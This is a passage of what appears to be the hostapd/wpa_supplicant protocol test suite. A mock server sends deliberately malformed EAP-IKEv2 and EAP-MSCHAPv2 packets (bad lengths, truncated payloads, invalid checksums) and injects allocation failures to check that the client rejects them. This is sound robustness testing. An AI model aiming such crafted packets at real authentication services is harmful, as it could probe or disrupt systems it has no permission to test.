return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_IKEV2, 0xc0, 2, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragments (second fragment)")
return struct.pack(">BBHBB2B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_IKEV2, 0x00, 2, 3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No Message Length field in first fragment")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_IKEV2, 0x40, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: ICV before keys")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_IKEV2, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported IKEv2 header version")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Incorrect IKEv2 header Length")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Exchange Type in SA_INIT state")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 0, 0, 0, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Message ID in SA_INIT state")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0, 1, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Flags value")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0, 0, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected IKEv2 Flags value(2)")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0x20, 0, 28)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No SAi1 in SA_INIT")
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 28,
EAP_TYPE_IKEV2, 0x00,
0, 0, 0, 0,
0, 0x20, 34, 0x08, 0, 28)
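# Helper for the remaining cases: wraps an IKEv2 payload in the fixed
# 28-octet IKE header (RFC 7296): initiator/responder SPIs (8 + 8),
# next payload, version (0x20 = 2.0), exchange type (34 = IKE_SA_INIT),
# flags (0x08 = Initiator), message ID, and total length.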
def build_ike(id, next=0, exch_type=34, flags=0x00, ike=''):
return struct.pack(">BBHBB2L2LBBBBLL", EAP_CODE_REQUEST, id,
4 + 1 + 1 + 28 + len(ike),
EAP_TYPE_IKEV2, flags,
0, 0, 0, 0,
next, 0x20, exch_type, 0x08, 0,
28 + len(ike)) + ike
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected extra data after payloads")
return build_ike(ctx['id'], ike=struct.pack(">B", 1))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated payload header")
return build_ike(ctx['id'], next=128, ike=struct.pack(">B", 1))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too small payload header length")
ike = struct.pack(">BBH", 0, 0, 3)
return build_ike(ctx['id'], next=128, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large payload header length")
ike = struct.pack(">BBH", 0, 0, 5)
return build_ike(ctx['id'], next=128, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported payload (non-critical and critical)")
ike = struct.pack(">BBHBBH", 129, 0, 4, 0, 0x01, 4)
return build_ike(ctx['id'], next=128, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Certificate and empty SAi1")
ike = struct.pack(">BBHBBH", 33, 0, 4, 0, 0, 4)
return build_ike(ctx['id'], next=37, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short proposal")
ike = struct.pack(">BBHBBHBBB", 0, 0, 4 + 7,
0, 0, 7, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too small proposal length in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 7, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large proposal length in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 9, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected proposal type in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
1, 0, 8, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Protocol ID in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 0, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected proposal number in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 0, 1, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Not enough room for SPI in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 1, 1, 1, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected SPI in SAi1")
ike = struct.pack(">BBHBBHBBBBB", 0, 0, 4 + 9,
0, 0, 9, 1, 1, 1, 0, 1)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No transforms in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 1, 1, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short transform in SAi1")
ike = struct.pack(">BBHBBHBBBB", 0, 0, 4 + 8,
0, 0, 8, 1, 1, 0, 1)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too small transform length in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
0, 0, 7, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large transform length in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
0, 0, 9, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Transform type in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
1, 0, 8, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No transform attributes in SAi1")
ike = struct.pack(">BBHBBHBBBBBBHBBH", 0, 0, 4 + 8 + 8,
0, 0, 8 + 8, 1, 1, 0, 1,
0, 0, 8, 0, 0, 0)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No transform attr for AES and unexpected data after transforms in SAi1")
tlen1 = 8 + 3
tlen2 = 8 + 4
tlen3 = 8 + 4
tlen = tlen1 + tlen2 + tlen3
ike = struct.pack(">BBHBBHBBBBBBHBBH3BBBHBBHHHBBHBBHHHB",
0, 0, 4 + 8 + tlen + 1,
0, 0, 8 + tlen + 1, 1, 1, 0, 3,
3, 0, tlen1, 1, 0, 12, 1, 2, 3,
3, 0, tlen2, 1, 0, 12, 0, 128,
0, 0, tlen3, 1, 0, 12, 0x8000 | 14, 127,
1)
return build_ike(ctx['id'], next=33, ike=ike)
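# Builds a minimal acceptable SAi1: one proposal for protocol IKE (1)
# with five transforms. Per the IKEv2 IANA registries these are
# ENCR_3DES (type 1, id 3), PRF_HMAC_MD5 (type 2, id 1),
# AUTH_HMAC_MD5_96 (type 3, id 1) and 1536-bit MODP D-H (type 4, id 5);
# the last transform uses a private-use type (241) that a parser is
# expected to skip.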
def build_sa(next=0):
tlen = 5 * 8
return struct.pack(">BBHBBHBBBBBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
next, 0, 4 + 8 + tlen,
0, 0, 8 + tlen, 1, 1, 0, 5,
3, 0, 8, 1, 0, 3,
3, 0, 8, 2, 0, 1,
3, 0, 8, 3, 0, 1,
3, 0, 8, 4, 0, 5,
0, 0, 8, 241, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, but no KEi in SAi1")
ike = build_sa()
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Empty KEi in SAi1")
ike = build_sa(next=34) + struct.pack(">BBH", 0, 0, 4)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Mismatch in DH Group in SAi1")
ike = build_sa(next=34)
ike += struct.pack(">BBHHH", 0, 0, 4 + 4 + 96, 12345, 0)
ike += 96*'\x00'
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid DH public value length in SAi1")
ike = build_sa(next=34)
ike += struct.pack(">BBHHH", 0, 0, 4 + 4 + 96, 5, 0)
ike += 96*'\x00'
return build_ike(ctx['id'], next=33, ike=ike)
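# Key Exchange payload for D-H group 5 (1536-bit MODP): a 192-octet
# public value, mostly zero with a trailing 0x02 so it is non-trivial.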
def build_ke(next=0):
ke = struct.pack(">BBHHH", next, 0, 4 + 4 + 192, 5, 0)
ke += 191*'\x00'+'\x02'
return ke
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal and KEi, but no Ni in SAi1")
ike = build_sa(next=34)
ike += build_ke()
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short Ni in SAi1")
ike = build_sa(next=34)
ike += build_ke(next=40)
ike += struct.pack(">BBH", 0, 0, 4)
return build_ike(ctx['id'], next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long Ni in SAi1")
ike = build_sa(next=34)
ike += build_ke(next=40)
ike += struct.pack(">BBH", 0, 0, 4 + 257) + 257*'\x00'
return build_ike(ctx['id'], next=33, ike=ike)
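# Nonce payload with a 256-octet Ni - the maximum RFC 7296 allows
# (16..256 octets); the case above verified that 257 octets is rejected.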
def build_ni(next=0):
return struct.pack(">BBH", next, 0, 4 + 256) + 256*'\x00'
def build_sai1(id):
ike = build_sa(next=34)
ike += build_ke(next=40)
ike += build_ni()
return build_ike(id, next=33, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: No integrity checksum")
ike = ''
return build_ike(ctx['id'], next=37, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated integrity checksum")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_IKEV2, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid proposal, KEi, and Ni in SAi1")
return build_sai1(ctx['id'])
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid integrity checksum")
ike = ''
return build_ike(ctx['id'], next=37, flags=0x20, ike=ike)
idx += 1
if ctx['num'] == idx:
logger.info("No more test responses available - test case completed")
global eap_proto_ikev2_test_done
eap_proto_ikev2_test_done = True
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_IKEV2)
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(ikev2_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_ikev2_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="user",
password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP method start")
if i in [ 41, 46 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
dev[1].dump_monitor()
dev[2].dump_monitor()
finally:
stop_radius_server(srv)
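# RFC 2759 (MS-CHAP-V2) helper primitives, used below to compute a valid
# Authenticator Response for the password-change cases. Note that
# hashlib's 'md4' is provided by OpenSSL and may be unavailable if
# OpenSSL was built without legacy algorithms.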
def NtPasswordHash(password):
pw = password.encode('utf_16_le')
return hashlib.new('md4', pw).digest()
def HashNtPasswordHash(password_hash):
return hashlib.new('md4', password_hash).digest()
def ChallengeHash(peer_challenge, auth_challenge, username):
data = peer_challenge + auth_challenge + username
return hashlib.sha1(data).digest()[0:8]
def GenerateAuthenticatorResponse(password, nt_response, peer_challenge,
auth_challenge, username):
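# Fixed pads from RFC 2759: magic1 decodes to "Magic server to client
# signing constant" and magic2 to "Pad to make it do more than one
# iteration".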
magic1 = binascii.unhexlify("4D616769632073657276657220746F20636C69656E74207369676E696E6720636F6E7374616E74")
magic2 = binascii.unhexlify("50616420746F206D616B6520697420646F206D6F7265207468616E206F6E6520697465726174696F6E")
password_hash = NtPasswordHash(password)
password_hash_hash = HashNtPasswordHash(password_hash)
data = password_hash_hash + nt_response + magic1
digest = hashlib.sha1(data).digest()
challenge = ChallengeHash(peer_challenge, auth_challenge, username)
data = digest + challenge + magic2
resp = hashlib.sha1(data).digest()
return resp
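# Usage sketch (placeholder values, not RFC test vectors):
#   resp = GenerateAuthenticatorResponse("new-pw", nt_response,
#                                        peer_challenge, auth_challenge,
#                                        "user")
#   payload = "S=" + resp.encode('hex').upper()
# This mirrors how the MSCHAPv2 handlers below build the success
# message after a password change.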
def test_eap_proto_ikev2_errors(dev, apdev):
"""EAP-IKEv2 local error cases"""
check_eap_capa(dev[0], "IKEV2")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_ikev2_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user",
password="ike password",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "ikev2_encr_encrypt"),
(1, "ikev2_encr_decrypt"),
(1, "ikev2_derive_auth_data"),
(2, "ikev2_derive_auth_data"),
(1, "=ikev2_decrypt_payload"),
(1, "ikev2_encr_decrypt;ikev2_decrypt_payload"),
(1, "ikev2_encr_encrypt;ikev2_build_encrypted"),
(1, "ikev2_derive_sk_keys"),
(2, "ikev2_derive_sk_keys"),
(3, "ikev2_derive_sk_keys"),
(4, "ikev2_derive_sk_keys"),
(5, "ikev2_derive_sk_keys"),
(6, "ikev2_derive_sk_keys"),
(7, "ikev2_derive_sk_keys"),
(8, "ikev2_derive_sk_keys"),
(1, "eap_ikev2_derive_keymat;eap_ikev2_peer_keymat"),
(1, "eap_msg_alloc;eap_ikev2_build_msg"),
(1, "eap_ikev2_getKey"),
(1, "eap_ikev2_get_emsk"),
(1, "eap_ikev2_get_session_id"),
(1, "=ikev2_derive_keys"),
(2, "=ikev2_derive_keys"),
(1, "wpabuf_alloc;ikev2_process_kei"),
(1, "=ikev2_process_idi"),
(1, "ikev2_derive_auth_data;ikev2_build_auth"),
(1, "wpabuf_alloc;ikev2_build_sa_init"),
(2, "wpabuf_alloc;ikev2_build_sa_init"),
(3, "wpabuf_alloc;ikev2_build_sa_init"),
(4, "wpabuf_alloc;ikev2_build_sa_init"),
(5, "wpabuf_alloc;ikev2_build_sa_init"),
(6, "wpabuf_alloc;ikev2_build_sa_init"),
(1, "wpabuf_alloc;ikev2_build_sa_auth"),
(2, "wpabuf_alloc;ikev2_build_sa_auth"),
(1, "ikev2_build_auth;ikev2_build_sa_auth") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user@domain",
password="ike password", erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "wpabuf_alloc;ikev2_build_notify"),
(2, "wpabuf_alloc;ikev2_build_notify"),
(1, "ikev2_build_encrypted;ikev2_build_notify") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user",
password="wrong password", erp="1",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "ikev2_integ_hash"),
(1, "ikev2_integ_hash;ikev2_decrypt_payload"),
(1, "os_get_random;ikev2_build_encrypted"),
(1, "ikev2_prf_plus;ikev2_derive_sk_keys"),
(1, "eap_ikev2_derive_keymat;eap_ikev2_peer_keymat"),
(1, "os_get_random;ikev2_build_sa_init"),
(2, "os_get_random;ikev2_build_sa_init"),
(1, "ikev2_integ_hash;eap_ikev2_validate_icv"),
(1, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_keys"),
(1, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_auth_data"),
(2, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_auth_data"),
(3, "hmac_sha1_vector;?ikev2_prf_hash;ikev2_derive_auth_data") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user",
password="ike password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
params = { "ssid": "eap-test2", "wpa": "2", "wpa_key_mgmt": "WPA-EAP",
"rsn_pairwise": "CCMP", "ieee8021x": "1",
"eap_server": "1", "eap_user_file": "auth_serv/eap_user.conf",
"fragment_size": "50" }
hostapd.add_ap(apdev[1], params)
tests = [ (1, "eap_ikev2_build_frag_ack"),
(1, "wpabuf_alloc;eap_ikev2_process_fragment") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test2", key_mgmt="WPA-EAP", scan_freq="2412",
eap="IKEV2", identity="ikev2 user",
password="ike password", erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_mschapv2(dev, apdev):
"""EAP-MSCHAPv2 protocol tests"""
check_eap_capa(dev[0], "MSCHAPV2")
def mschapv2_handler(ctx, req):
logger.info("mschapv2_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_MSCHAPV2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown MSCHAPv2 op_code")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
0, 0, 5, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ms_len and unknown MSCHAPv2 op_code")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
255, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success before challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
3, 0, 5, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - required challenge field not present")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
4, 0, 5, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - invalid failure challenge len")
payload = 'C=12'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - invalid failure challenge len")
payload = 'C=12 V=3'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - invalid failure challenge")
payload = 'C=00112233445566778899aabbccddeefQ '
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure before challenge - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
payload = "S=1122334455667788990011223344556677889900"
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid challenge length")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short challenge packet")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1, 16)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
if len(req) != 591:
logger.info("Unexpected Change-Password packet length: %s" % len(req))
return None
data = req[9:]
enc_pw = data[0:516]
data = data[516:]
enc_hash = data[0:16]
data = data[16:]
peer_challenge = data[0:16]
data = data[16:]
# Reserved
data = data[8:]
nt_response = data[0:24]
data = data[24:]
flags = data
logger.info("enc_hash: " + enc_hash.encode("hex"))
logger.info("peer_challenge: " + peer_challenge.encode("hex"))
logger.info("nt_response: " + nt_response.encode("hex"))
logger.info("flags: " + flags.encode("hex"))
auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
logger.info("auth_challenge: " + auth_challenge.encode("hex"))
auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
peer_challenge,
auth_challenge, "user")
payload = "S=" + auth_resp.encode('hex').upper()
logger.info("Success message payload: " + payload)
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Success after password change")
if len(req) != 591:
logger.info("Unexpected Change-Password packet length: %s" % len(req))
return None
data = req[9:]
enc_pw = data[0:516]
data = data[516:]
enc_hash = data[0:16]
data = data[16:]
peer_challenge = data[0:16]
data = data[16:]
# Reserved
data = data[8:]
nt_response = data[0:24]
data = data[24:]
flags = data
logger.info("enc_hash: " + enc_hash.encode("hex"))
logger.info("peer_challenge: " + peer_challenge.encode("hex"))
logger.info("nt_response: " + nt_response.encode("hex"))
logger.info("flags: " + flags.encode("hex"))
auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
logger.info("auth_challenge: " + auth_challenge.encode("hex"))
auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
peer_challenge,
auth_challenge, "user")
payload = "S=" + auth_resp.encode('hex').upper()
logger.info("Success message payload: " + payload)
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
